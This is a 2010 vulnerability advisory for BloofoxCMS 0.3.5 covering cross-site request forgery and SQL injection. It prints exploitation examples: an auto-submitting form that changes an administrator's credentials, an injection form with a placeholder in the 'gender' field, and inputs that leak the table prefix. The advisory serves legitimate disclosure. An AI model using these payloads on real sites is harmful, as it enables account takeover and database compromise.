Total Tests:

Multiple Vulnerabilities in BloofoxCMS

Advisory ID:HTB22415
Product:bloofoxCMS
Vendor:Alexander Lang
Vulnerable Versions:0.3.5 and probably prior
Tested Version:0.3.5
Advisory Publication:June 3, 2010 [without technical details]
Vendor Notification:June 3, 2010
Public Disclosure:June 17, 2010
Vulnerability Type:Cross-Site Request Forgery [CWE-352]
SQL Injection [CWE-89]
Risk Level:High
CVSSv2 Base Scores:5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in BloofoxCMS which could be exploited to perform cross-site request forgery and SQL injection attacks.

1) Cross-site request forgery (CSRF) in BloofoxCMS
The vulnerability exists due to insufficient validation of the request origin in admin/index.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change the administrator`s credentials.
Exploitation example:
<form action="http://demo.bloofox.com/admin/index.php?mode=user&action=edit" method="post" name="main" >
<input type="hidden" name="username" value="test" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="pwdconfirm" value="" />
<input type="hidden" name="1" value="User" />
<input type="hidden" name="2" value="Editor" />
<input type="hidden" name="3" value="Admin" />
<input type="hidden" name="blocked" value="0" />
<input type="hidden" name="deleted" value="0" />
<input type="hidden" name="status" value="0" />
<input type="hidden" name="login_page" value="0" />
<input type="hidden" name="userid" value="3" />
<input type="hidden" name="send" value="Save Changes" />
</form>
<script>
document.main.submit();
</script>


2) SQL injection vulnerability in BloofoxCMS
The vulnerability exists due to input sanitation errors in the "gender" parameter in index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
<form action="http://host/index.php?page=8" method="post">
<input type="hidden" name="un" value="testuser">
<input type="hidden" name="pwd" value="123456">
<input type="hidden" name="pwd2" value="123456">
<input type="hidden" name="em" value="email@email.com">
<input type="hidden" name="gender" value="'SQL_CODE_HERE">
<input name="send" value="Register &amp; Create Account" type="submit">
</form>


Two other weaknesses have been discovered in BloofoxCMS which could allow a remote attacker to reveal the database tables prefix and simplify exploitation of this vulnerability. Examples:
1. Weakness in the "key" parameter in index.php
http://[host]/index.php?key=\\
2. Weakness in the "username" HTTP POST parameter in index.php
<form action="http://[host]/index.php?login=true" method="post">
<input name="username" type="hidden" value="\\">
<input name="password" type="hidden" value="password">
<input value="Login" name="login" type="submit">
</form>

How to Detect Cross-Site Request Forgery Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Upgrade to the most recent version


References:
[1] High-Tech Bridge Advisory HTB22415 - https://www.immuniweb.com/advisory/HTB22415 - Multiple Vulnerabilities in BloofoxCMS
[2] BloofoxCMS- bloofox.com - bloofoxCMS is free software published under the GNU GPL.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential